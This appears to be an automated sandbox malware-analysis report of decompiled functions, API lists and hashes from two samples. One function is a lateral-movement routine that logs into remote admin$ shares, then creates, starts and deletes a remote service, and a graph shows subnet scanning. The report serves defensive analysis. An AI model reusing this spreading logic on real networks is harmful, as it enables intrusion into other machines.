                                                                                                          				_push(E0040B3D1);
                                                                                                          				return E004039AC( &_v8);
                                                                                                          			}













                                                                                                          0x0040b2f9
                                                                                                          0x0040b2fc
                                                                                                          0x0040b2fe
                                                                                                          0x0040b302
                                                                                                          0x0040b303
                                                                                                          0x0040b308
                                                                                                          0x0040b30b
                                                                                                          0x0040b310
                                                                                                          0x0040b31c
                                                                                                          0x0040b327
                                                                                                          0x0040b332
                                                                                                          0x0040b339
                                                                                                          0x0040b352
                                                                                                          0x0040b33b
                                                                                                          0x0040b343
                                                                                                          0x0040b343
                                                                                                          0x0040b366
                                                                                                          0x0040b37f
                                                                                                          0x0040b38e
                                                                                                          0x0040b394
                                                                                                          0x0040b3af
                                                                                                          0x0040b3af
                                                                                                          0x0040b394
                                                                                                          0x0040b3b6
                                                                                                          0x0040b3b9
                                                                                                          0x0040b3bc
                                                                                                          0x0040b3c9

                                                                                                          APIs
                                                                                                          • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0040B3CA), ref: 0040B372
                                                                                                          • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0040B3CA), ref: 0040B378
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DateFormatLocaleThread
                                                                                                          • String ID: yyyy
                                                                                                          • API String ID: 3303714858-3145165042
                                                                                                          • Opcode ID: 885e4c27a1216b17a0c31e6b7352c7ee43f58de2aae632ef4a415d169554587d
                                                                                                          • Instruction ID: 73b892271113bbbbdae0ef577cd336b99a0cbc3d07830473da285584bb1de4d6
                                                                                                          • Opcode Fuzzy Hash: 885e4c27a1216b17a0c31e6b7352c7ee43f58de2aae632ef4a415d169554587d
                                                                                                          • Instruction Fuzzy Hash: 7D213175600648ABDB01EF55C842AAE77A8EF48704F60407AFD04F7791D7789E408BAD
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                            • Part of subcall function 0040865C: GetWindowTextLengthA.USER32(?), ref: 0040866D
                                                                                                            • Part of subcall function 0040865C: GetWindowTextA.USER32(?,?,00000001), ref: 0040868D
                                                                                                          • WinExec.KERNEL32(explorer.exe,00000001), ref: 00417095
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: TextWindow$ExecLength
                                                                                                          • String ID: 9786775$explorer.exe
                                                                                                          • API String ID: 115403521-1257943924
                                                                                                          • Opcode ID: 15c5f1cb987b3db33f017bf8d90f669295af8f305caff8f5978a728cf0ff2006
                                                                                                          • Instruction ID: 996130340d25c92e2aaf75525aef91bf16520e7e0ea9b7ae20f6f14c8a600e54
                                                                                                          • Opcode Fuzzy Hash: 15c5f1cb987b3db33f017bf8d90f669295af8f305caff8f5978a728cf0ff2006
                                                                                                          • Instruction Fuzzy Hash: 7411CA347043049BD700FF55C882B8DBBB5DF4C704F51846BF8006B382DA79AE44865D
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 92%
                                                                                                          			E0040784C(void* __eax) {
                                                                                                          				void* _t8;
                                                                                                          				void* _t9;
                                                                                                          				void* _t12;
                                                                                                          				intOrPtr _t13;
                                                                                                          
                                                                                                          				_t12 = __eax;
                                                                                                          				_t8 =  *((intOrPtr*)(__eax + 0xfe)) + 1;
                                                                                                          				if(_t8 != 0) {
                                                                                                          					_t8 = _t8 - 1;
                                                                                                          					if(_t8 == 0) {
                                                                                                          						_t13 =  *0x4198a8; // 0x20a0a88
                                                                                                          						asm("jecxz 0x28");
                                                                                                          						if(_t13 == __eax) {
                                                                                                          							_t9 = LoadIconA( *0x419660, "MAINICON");
                                                                                                          							L6:
                                                                                                          							 *(_t12 + 0xfe) = _t9;
                                                                                                          							return _t9;
                                                                                                          						}
                                                                                                          						_t8 = E0040784C(_t13);
                                                                                                          						if(_t8 != 0) {
                                                                                                          							_t9 = CopyImage(_t8, 1, 0, 0, 0);
                                                                                                          							goto L6;
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _t8;
                                                                                                          			}







                                                                                                          0x0040784d
                                                                                                          0x00407854
                                                                                                          0x00407855
                                                                                                          0x00407857
                                                                                                          0x00407858
                                                                                                          0x0040785a
                                                                                                          0x00407860
                                                                                                          0x00407864
                                                                                                          0x00407893
                                                                                                          0x00407898
                                                                                                          0x00407898
                                                                                                          0x00000000
                                                                                                          0x00407898
                                                                                                          0x00407867
                                                                                                          0x0040786e
                                                                                                          0x00407878
                                                                                                          0x00000000
                                                                                                          0x00407878
                                                                                                          0x0040786e
                                                                                                          0x00407858
                                                                                                          0x0040789f

                                                                                                          APIs
                                                                                                          • LoadIconA.USER32(MAINICON), ref: 00407893
                                                                                                            • Part of subcall function 0040784C: CopyImage.USER32(00000000,00000001,00000000,00000000,00000000), ref: 00407878
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CopyIconImageLoad
                                                                                                          • String ID: MAINICON
                                                                                                          • API String ID: 2942751960-2283262055
                                                                                                          • Opcode ID: 119e4a5c4e49fca7c17498290489cfe213306658b47fb0a8c5444fd9a1617de3
                                                                                                          • Instruction ID: 765a2b68a7498b3ab5f748f0199c0c994a5a833c252eecff751bbfb4c949c7d4
                                                                                                          • Opcode Fuzzy Hash: 119e4a5c4e49fca7c17498290489cfe213306658b47fb0a8c5444fd9a1617de3
                                                                                                          • Instruction Fuzzy Hash: ABE092B39681025EDA24BA628C88D37266CDBC0700B58C03FA805A61D7CA3CFC01D53F
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 78%
                                                                                                          			E00411344(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                                          				void* _v8;
                                                                                                          				char _v264;
                                                                                                          				char _v520;
                                                                                                          				char _v524;
                                                                                                          				signed char _t47;
                                                                                                          				intOrPtr* _t59;
                                                                                                          				intOrPtr _t61;
                                                                                                          				intOrPtr* _t75;
                                                                                                          				void* _t78;
                                                                                                          
                                                                                                          				_v524 = 0;
                                                                                                          				_t75 = __edx;
                                                                                                          				_t47 = __eax;
                                                                                                          				_push(_t78);
                                                                                                          				_push(0x41146a);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t78 + 0xfffffdf8;
                                                                                                          				_t73 = __eax & 0x00000fff;
                                                                                                          				if((__eax & 0x00000fff) > 0x14) {
                                                                                                          					if(__eax != 0x100) {
                                                                                                          						if(__eax != 0x101) {
                                                                                                          							if(E004117A0(__eax,  &_v8) == 0) {
                                                                                                          								E00409A68( &_v524, 4);
                                                                                                          								_t59 =  *0x4186b0; // 0x418270
                                                                                                          								E00403C94(_t75, _v524,  *_t59);
                                                                                                          							} else {
                                                                                                          								E00402E70( *_v8,  &_v520);
                                                                                                          								E0040275C( &_v520, 0x7fffffff, 2,  &_v264);
                                                                                                          								E00403C10(__edx,  &_v264);
                                                                                                          							}
                                                                                                          						} else {
                                                                                                          							E00403A00(__edx, 0x411490);
                                                                                                          						}
                                                                                                          					} else {
                                                                                                          						E00403A00(__edx, "String");
                                                                                                          					}
                                                                                                          				} else {
                                                                                                          					E00403A00(__edx,  *((intOrPtr*)(0x418468 + (_t73 & 0x0000ffff) * 4)));
                                                                                                          				}
                                                                                                          				if((_t47 & 0x00000020) != 0) {
                                                                                                          					E00403C94(_t75,  *_t75, "Array ");
                                                                                                          				}
                                                                                                          				if((_t47 & 0x00000040) != 0) {
                                                                                                          					E00403C94(_t75,  *_t75, "ByRef ");
                                                                                                          				}
                                                                                                          				_pop(_t61);
                                                                                                          				 *[fs:eax] = _t61;
                                                                                                          				_push(E00411471);
                                                                                                          				return E004039AC( &_v524);
                                                                                                          			}












                                                                                                          0x00411352
                                                                                                          0x00411358
                                                                                                          0x0041135a
                                                                                                          0x0041135e
                                                                                                          0x0041135f
                                                                                                          0x00411364
                                                                                                          0x00411367
                                                                                                          0x0041136c
                                                                                                          0x00411375
                                                                                                          0x00411392
                                                                                                          0x004113aa
                                                                                                          0x004113c6
                                                                                                          0x00411411
                                                                                                          0x0041141c
                                                                                                          0x00411426
                                                                                                          0x004113c8
                                                                                                          0x004113da
                                                                                                          0x004113ef
                                                                                                          0x004113fc
                                                                                                          0x004113fc
                                                                                                          0x004113ac
                                                                                                          0x004113b3
                                                                                                          0x004113b3
                                                                                                          0x00411394
                                                                                                          0x0041139b
                                                                                                          0x0041139b
                                                                                                          0x00411377
                                                                                                          0x00411383
                                                                                                          0x00411383
                                                                                                          0x0041142e
                                                                                                          0x00411439
                                                                                                          0x00411439
                                                                                                          0x00411441
                                                                                                          0x0041144c
                                                                                                          0x0041144c
                                                                                                          0x00411453
                                                                                                          0x00411456
                                                                                                          0x00411459
                                                                                                          0x00411469

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Any$Array $ByRef $String
                                                                                                          • API String ID: 0-2719049652
                                                                                                          • Opcode ID: 389b1a4c981d8c9ac40f03055e0685b97b8a94a69abb4050b5030a4c73244b48
                                                                                                          • Instruction ID: 759db39838c32d1211e4e8916265be04126e20bad23ac840fd781b46fc79011b
                                                                                                          • Opcode Fuzzy Hash: 389b1a4c981d8c9ac40f03055e0685b97b8a94a69abb4050b5030a4c73244b48
                                                                                                          • Instruction Fuzzy Hash: 35210A347041144BD720EF15C8456EA77A9EB88B04F6141BBBB55A33E2CB7C9EC18A9D
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 63 4a49534-4a4955a call 4a4a760 66 4a49560-4a49604 wsprintfW call 4a488d3 wsprintfW * 2 PathFindExtensionW 63->66 67 4a4985f 63->67 73 4a49606-4a49608 66->73 74 4a4960b-4a49625 wsprintfW 66->74 69 4a49867-4a4986c 67->69 71 4a49874-4a49888 SetLastError 69->71 72 4a4986e-4a49872 69->72 72->71 73->74 75 4a4962a-4a49651 WNetAddConnection2W PathFileExistsW 74->75 76 4a49653-4a49669 GetLastError call 4a487e7 75->76 77 4a496c8-4a496d0 75->77 80 4a4966e-4a49672 76->80 78 4a49844-4a49849 77->78 78->69 81 4a4984b-4a4985d WNetCancelConnection2W 78->81 82 4a49674-4a4967d GetLastError 80->82 83 4a496d5-4a496d8 80->83 81->69 82->78 86 4a49683-4a49686 82->86 84 4a496f4-4a49720 call 4a4944f OpenSCManagerW 83->84 85 4a496da-4a496dd 83->85 95 4a49726-4a4978f memset GetSystemTimeAsFileTime wsprintfW CreateServiceW 84->95 96 4a4982a-4a4982c GetLastError 84->96 85->84 87 4a496df-4a496ea call 4a468b5 85->87 86->78 89 4a4968c-4a4968f 86->89 87->84 89->78 92 4a49695-4a4969d 89->92 92->78 93 4a496a3-4a496a7 92->93 93->69 97 4a496ad-4a496c3 WNetCancelConnection2W 93->97 99 4a49791-4a497a4 StartServiceW 95->99 100 4a49809-4a49814 GetLastError 95->100 98 4a49830-4a49834 96->98 97->75 98->78 103 4a49836-4a4983e DeleteFileW 98->103 104 4a497a6-4a497b1 GetLastError 99->104 105 4a497c2-4a497c7 99->105 101 4a49816 100->101 102 4a4981e-4a49828 CloseServiceHandle 100->102 101->102 102->98 103->78 107 4a497b3-4a497b8 104->107 108 4a497ba 104->108 106 4a497cc-4a497dd QueryServiceStatus 105->106 109 4a497f3-4a49807 DeleteService CloseServiceHandle 106->109 110 4a497df-4a497e4 106->110 107->108 107->109 108->105 109->102 110->109 111 4a497e6-4a497f1 Sleep 110->111 111->106 111->109
                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A49534(int _a4, short* _a8, int _a12, short** _a16, long _a32, int _a36, void _a40, int _a44, void* _a48, struct _FILETIME _a52, void* _a56, struct _NETRESOURCE _a60, struct _SERVICE_STATUS _a100, intOrPtr _a104, short _a120, void _a122, short _a128, short _a152, char _a160, short _a184, char _a676, char _a680, char _a684, short _a1204, short _a1216, short _a1224, short _a3244, short _a3272, short _a5300, short _a5308, char _a7368, short _a7376) {
                                                                                                          				int _v0;
                                                                                                          				void* __ebx;
                                                                                                          				short** _t78;
                                                                                                          				WCHAR* _t96;
                                                                                                          				int _t100;
                                                                                                          				int _t102;
                                                                                                          				void* _t107;
                                                                                                          				void* _t111;
                                                                                                          				void* _t123;
                                                                                                          				long _t124;
                                                                                                          				int _t126;
                                                                                                          				long _t131;
                                                                                                          				long _t133;
                                                                                                          				int _t137;
                                                                                                          				signed int _t143;
                                                                                                          				WCHAR* _t151;
                                                                                                          				void* _t153;
                                                                                                          
                                                                                                          				E04A4A760(0x11cac);
                                                                                                          				_t137 = _a4;
                                                                                                          				_a4 = 0;
                                                                                                          				_v0 = 0;
                                                                                                          				_a12 = 0;
                                                                                                          				if(_t137 == 0) {
                                                                                                          					_v0 = 0x57;
                                                                                                          					goto L36;
                                                                                                          				} else {
                                                                                                          					_a152 = 0;
                                                                                                          					wsprintfW( &_a152, L"\\\\%s\\admin$", _t137);
                                                                                                          					_a36 = 0;
                                                                                                          					_t143 = 7;
                                                                                                          					memset( &_a40, 0, _t143 << 2);
                                                                                                          					_a56 =  &_a160;
                                                                                                          					_a40 = 1;
                                                                                                          					E04A488D3( &_a680);
                                                                                                          					_t151 = L"\\\\%ws\\admin$\\%ws";
                                                                                                          					wsprintfW( &_a3244, _t151, _t137,  &_a676);
                                                                                                          					_a5300 = 0;
                                                                                                          					_a1204 = 0;
                                                                                                          					wsprintfW( &_a5300, _t151, _t137,  &_a684);
                                                                                                          					_t96 = PathFindExtensionW( &_a5308);
                                                                                                          					if(_t96 != 0) {
                                                                                                          						 *_t96 = 0;
                                                                                                          					}
                                                                                                          					wsprintfW( &_a1216, _t151, _t137, L"cscc.dat");
                                                                                                          					_a40 = _a40 & 0x00000000;
                                                                                                          					while(1) {
                                                                                                          						_t100 = WNetAddConnection2W( &_a60, _a12, _a8, 0); // executed
                                                                                                          						_a44 = _t100;
                                                                                                          						_t102 = PathFileExistsW( &_a1224); // executed
                                                                                                          						if(_t102 != 0) {
                                                                                                          							break;
                                                                                                          						}
                                                                                                          						GetLastError();
                                                                                                          						_t107 = E04A487E7( *0x4a57b94,  &_a3272,  *0x4a53984); // executed
                                                                                                          						if(_t107 != 0) {
                                                                                                          							if(_a8 != 0 && _a12 != 0) {
                                                                                                          								E04A468B5(_a8, _a12);
                                                                                                          								 *0x4a53010 = 1;
                                                                                                          							}
                                                                                                          							_a7368 = 0;
                                                                                                          							E04A4944F( &_a7368);
                                                                                                          							_t111 = OpenSCManagerW(_a4, 0, 0xf003f);
                                                                                                          							_a44 = _t111;
                                                                                                          							if(_t111 == 0) {
                                                                                                          								_a32 = GetLastError();
                                                                                                          								goto L31;
                                                                                                          							} else {
                                                                                                          								_a120 = 0;
                                                                                                          								memset( &_a122, 0, 0x3e);
                                                                                                          								GetSystemTimeAsFileTime( &_a52);
                                                                                                          								wsprintfW( &_a120, L"%08X%08X", _a56, _a52.dwLowDateTime);
                                                                                                          								_t123 = CreateServiceW(_a56,  &_a128, 0, 0xf01ff, 0x10, 3, 0,  &_a7376, 0, 0, 0, 0, 0);
                                                                                                          								_a48 = _t123;
                                                                                                          								if(_t123 == 0) {
                                                                                                          									_t124 = GetLastError();
                                                                                                          									_a40 = _t124;
                                                                                                          									if(_t124 == 0x431) {
                                                                                                          										_a44 = 1;
                                                                                                          									}
                                                                                                          									L29:
                                                                                                          									CloseServiceHandle(_a56);
                                                                                                          									L31:
                                                                                                          									if(_a36 == 0) {
                                                                                                          										DeleteFileW( &_a3272);
                                                                                                          									}
                                                                                                          									L33:
                                                                                                          									if(_a44 == 0) {
                                                                                                          										WNetCancelConnection2W( &_a184, 0, 1);
                                                                                                          									}
                                                                                                          									L36:
                                                                                                          									_t78 = _a16;
                                                                                                          									if(_t78 != 0) {
                                                                                                          										 *_t78 = _a12;
                                                                                                          									}
                                                                                                          									SetLastError(_v0);
                                                                                                          									return _a4;
                                                                                                          								}
                                                                                                          								_a40 = 0;
                                                                                                          								_t126 = StartServiceW(_t123, 0, 0);
                                                                                                          								_a44 = _t126;
                                                                                                          								if(_t126 != 0) {
                                                                                                          									L22:
                                                                                                          									_t153 = 0xea60;
                                                                                                          									while(QueryServiceStatus(_a48,  &_a100) != 0 && _a104 != 1) {
                                                                                                          										Sleep(0x1388);
                                                                                                          										_t153 = _t153 - 0x1388;
                                                                                                          										if(_t153 > 0) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										break;
                                                                                                          									}
                                                                                                          									L26:
                                                                                                          									DeleteService(_a48);
                                                                                                          									CloseServiceHandle(_a48);
                                                                                                          									goto L29;
                                                                                                          								}
                                                                                                          								_t131 = GetLastError();
                                                                                                          								_a40 = _t131;
                                                                                                          								if(_t131 == 0x41d || _t131 == 0x420) {
                                                                                                          									_a44 = 1;
                                                                                                          									goto L22;
                                                                                                          								} else {
                                                                                                          									goto L26;
                                                                                                          								}
                                                                                                          							}
                                                                                                          						}
                                                                                                          						_t133 = GetLastError();
                                                                                                          						_a32 = _t133;
                                                                                                          						if(_t133 == 0x50 || _t133 == 0x35 || _t133 == 0x43 || _a44 != 0x4c3) {
                                                                                                          							goto L33;
                                                                                                          						} else {
                                                                                                          							if(_a40 != 0) {
                                                                                                          								goto L36;
                                                                                                          							}
                                                                                                          							WNetCancelConnection2W( &_a184, 0, 1);
                                                                                                          							_a40 = 1;
                                                                                                          							continue;
                                                                                                          						}
                                                                                                          					}
                                                                                                          					_a36 = 1;
                                                                                                          					goto L33;
                                                                                                          				}
                                                                                                          			}




















                                                                                                          0x04a4953f
                                                                                                          0x04a49545
                                                                                                          0x04a4954c
                                                                                                          0x04a49550
                                                                                                          0x04a49554
                                                                                                          0x04a4955a
                                                                                                          0x04a4985f
                                                                                                          0x00000000
                                                                                                          0x04a49560
                                                                                                          0x04a49569
                                                                                                          0x04a4957e
                                                                                                          0x04a49585
                                                                                                          0x04a4958b
                                                                                                          0x04a49590
                                                                                                          0x04a49599
                                                                                                          0x04a495a5
                                                                                                          0x04a495ad
                                                                                                          0x04a495bb
                                                                                                          0x04a495c9
                                                                                                          0x04a495cd
                                                                                                          0x04a495d5
                                                                                                          0x04a495ef
                                                                                                          0x04a495fc
                                                                                                          0x04a49604
                                                                                                          0x04a49608
                                                                                                          0x04a49608
                                                                                                          0x04a4961a
                                                                                                          0x04a49625
                                                                                                          0x04a4962a
                                                                                                          0x04a49637
                                                                                                          0x04a4963d
                                                                                                          0x04a49649
                                                                                                          0x04a49651
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a49653
                                                                                                          0x04a49669
                                                                                                          0x04a49672
                                                                                                          0x04a496d8
                                                                                                          0x04a496e5
                                                                                                          0x04a496ea
                                                                                                          0x04a496ea
                                                                                                          0x04a496f6
                                                                                                          0x04a49706
                                                                                                          0x04a49714
                                                                                                          0x04a4971a
                                                                                                          0x04a49720
                                                                                                          0x04a4982c
                                                                                                          0x00000000
                                                                                                          0x04a49726
                                                                                                          0x04a4972a
                                                                                                          0x04a49735
                                                                                                          0x04a49742
                                                                                                          0x04a4975a
                                                                                                          0x04a49783
                                                                                                          0x04a49789
                                                                                                          0x04a4978f
                                                                                                          0x04a49809
                                                                                                          0x04a4980b
                                                                                                          0x04a49814
                                                                                                          0x04a49816
                                                                                                          0x04a49816
                                                                                                          0x04a4981e
                                                                                                          0x04a49822
                                                                                                          0x04a49830
                                                                                                          0x04a49834
                                                                                                          0x04a4983e
                                                                                                          0x04a4983e
                                                                                                          0x04a49844
                                                                                                          0x04a49849
                                                                                                          0x04a49857
                                                                                                          0x04a49857
                                                                                                          0x04a49867
                                                                                                          0x04a49867
                                                                                                          0x04a4986c
                                                                                                          0x04a49872
                                                                                                          0x04a49872
                                                                                                          0x04a49878
                                                                                                          0x04a49888
                                                                                                          0x04a49888
                                                                                                          0x04a49794
                                                                                                          0x04a49798
                                                                                                          0x04a4979e
                                                                                                          0x04a497a4
                                                                                                          0x04a497c2
                                                                                                          0x04a497c2
                                                                                                          0x04a497cc
                                                                                                          0x04a497e7
                                                                                                          0x04a497ed
                                                                                                          0x04a497f1
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a497f1
                                                                                                          0x04a497f3
                                                                                                          0x04a497f7
                                                                                                          0x04a49801
                                                                                                          0x00000000
                                                                                                          0x04a49801
                                                                                                          0x04a497a6
                                                                                                          0x04a497a8
                                                                                                          0x04a497b1
                                                                                                          0x04a497ba
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a497b1
                                                                                                          0x04a49720
                                                                                                          0x04a49674
                                                                                                          0x04a49676
                                                                                                          0x04a4967d
                                                                                                          0x00000000
                                                                                                          0x04a496a3
                                                                                                          0x04a496a7
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a496b9
                                                                                                          0x04a496bf
                                                                                                          0x00000000
                                                                                                          0x04a496bf
                                                                                                          0x04a4967d
                                                                                                          0x04a496c8
                                                                                                          0x00000000
                                                                                                          0x04a496c8

                                                                                                          APIs
                                                                                                          • wsprintfW.USER32 ref: 04A4957E
                                                                                                            • Part of subcall function 04A488D3: PathFindFileNameW.SHLWAPI(04A57BC8,775EC0B0,?,04A495B2), ref: 04A488E3
                                                                                                          • wsprintfW.USER32 ref: 04A495C9
                                                                                                          • wsprintfW.USER32 ref: 04A495EF
                                                                                                          • PathFindExtensionW.SHLWAPI(?,?,?,?,?,?,?,?,?), ref: 04A495FC
                                                                                                          • wsprintfW.USER32 ref: 04A4961A
                                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 04A49637
                                                                                                          • PathFileExistsW.KERNELBASE(?), ref: 04A49649
                                                                                                          • GetLastError.KERNEL32 ref: 04A49653
                                                                                                          • GetLastError.KERNEL32(?), ref: 04A49674
                                                                                                          • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04A496B9
                                                                                                          • OpenSCManagerW.ADVAPI32(?,00000000,000F003F,?,?), ref: 04A49714
                                                                                                          • memset.MSVCRT ref: 04A49735
                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04A49742
                                                                                                          • wsprintfW.USER32 ref: 04A4975A
                                                                                                          • CreateServiceW.ADVAPI32(?,?,00000000,000F01FF,00000010,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 04A49783
                                                                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 04A49798
                                                                                                          • GetLastError.KERNEL32 ref: 04A497A6
                                                                                                          • QueryServiceStatus.ADVAPI32(?,?), ref: 04A497D5
                                                                                                          • Sleep.KERNEL32(00001388), ref: 04A497E7
                                                                                                          • DeleteService.ADVAPI32(?), ref: 04A497F7
                                                                                                          • CloseServiceHandle.ADVAPI32(?), ref: 04A49801
                                                                                                          • GetLastError.KERNEL32 ref: 04A49809
                                                                                                          • CloseServiceHandle.ADVAPI32(?), ref: 04A49822
                                                                                                          • GetLastError.KERNEL32 ref: 04A4982A
                                                                                                            • Part of subcall function 04A468B5: GetProcessHeap.KERNEL32(00000008,?,775EC0B0,00000000), ref: 04A468EB
                                                                                                            • Part of subcall function 04A468B5: HeapAlloc.KERNEL32(00000000), ref: 04A468F4
                                                                                                            • Part of subcall function 04A468B5: memcpy.MSVCRT ref: 04A46921
                                                                                                            • Part of subcall function 04A468B5: GetProcessHeap.KERNEL32(00000008,?,74714D40), ref: 04A46946
                                                                                                            • Part of subcall function 04A468B5: HeapAlloc.KERNEL32(00000000), ref: 04A46949
                                                                                                            • Part of subcall function 04A468B5: memcpy.MSVCRT ref: 04A46978
                                                                                                            • Part of subcall function 04A468B5: GetProcessHeap.KERNEL32(00000000,?,?), ref: 04A46995
                                                                                                            • Part of subcall function 04A468B5: HeapFree.KERNEL32(00000000), ref: 04A46998
                                                                                                            • Part of subcall function 04A468B5: GetProcessHeap.KERNEL32(00000000,?), ref: 04A4699F
                                                                                                            • Part of subcall function 04A468B5: HeapFree.KERNEL32(00000000), ref: 04A469A2
                                                                                                          • DeleteFileW.KERNEL32(?), ref: 04A4983E
                                                                                                          • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04A49857
                                                                                                          • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,04A4A0AD,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000024,Function_00006AA8), ref: 04A49878
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$ErrorLastService$wsprintf$FileProcess$Connection2Path$AllocCancelCloseDeleteFindFreeHandleTimememcpy$CreateExistsExtensionManagerNameOpenQuerySleepStartStatusSystemmemset
                                                                                                          • String ID: %08X%08X$W$\\%s\admin$$\\%ws\admin$\%ws$cscc.dat
                                                                                                          • API String ID: 719309661-1529897384
                                                                                                          • Opcode ID: 40ea0247358a7526864c5b46fed70818536458a01f49d918f9344b70c4299a1c
                                                                                                          • Instruction ID: 8cebabe130f9590e4728dbf6e3918385ad15a32156e68e8a6c4e207fd996cf28
                                                                                                          • Opcode Fuzzy Hash: 40ea0247358a7526864c5b46fed70818536458a01f49d918f9344b70c4299a1c
                                                                                                          • Instruction Fuzzy Hash: 0391F5B1508345ABEB20DF64D888AAFBBECFFD4314F00092EF58992150E775E9558B62
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 146 4a48b2e-4a48b94 call 4a4a760 memset * 2 GetAdaptersInfo 149 4a48d2e-4a48d36 146->149 150 4a48b9a-4a48bae LocalAlloc 146->150 150->149 151 4a48bb4-4a48bbe GetAdaptersInfo 150->151 152 4a48d24-4a48d28 LocalFree 151->152 153 4a48bc4-4a48bcc 151->153 152->149 154 4a48c77-4a48c7e call 4a47d4e 153->154 155 4a48bd2-4a48c12 inet_addr * 2 call 4a4641a 153->155 162 4a48c80-4a48c83 call 4a48d39 154->162 163 4a48c88-4a48c8c 154->163 160 4a48c14-4a48c2a call 4a46b95 155->160 161 4a48c31-4a48c37 155->161 160->161 166 4a48c69-4a48c71 161->166 167 4a48c39-4a48c4b call 4a4641a 161->167 162->163 168 4a48d0d-4a48d11 163->168 169 4a48c8e 163->169 166->153 166->154 167->166 178 4a48c4d-4a48c62 call 4a46b95 167->178 168->152 173 4a48d13-4a48d22 CloseHandle 168->173 172 4a48c94-4a48ca2 LocalAlloc 169->172 175 4a48ca4-4a48cc3 inet_addr 172->175 176 4a48cff-4a48d0b 172->176 173->152 173->173 175->176 179 4a48cc5-4a48ccd 175->179 176->168 176->172 178->166 179->176 181 4a48ccf-4a48cf5 htonl * 2 CreateThread 179->181 181->176 183 4a48cf7-4a48cfb 181->183 183->176
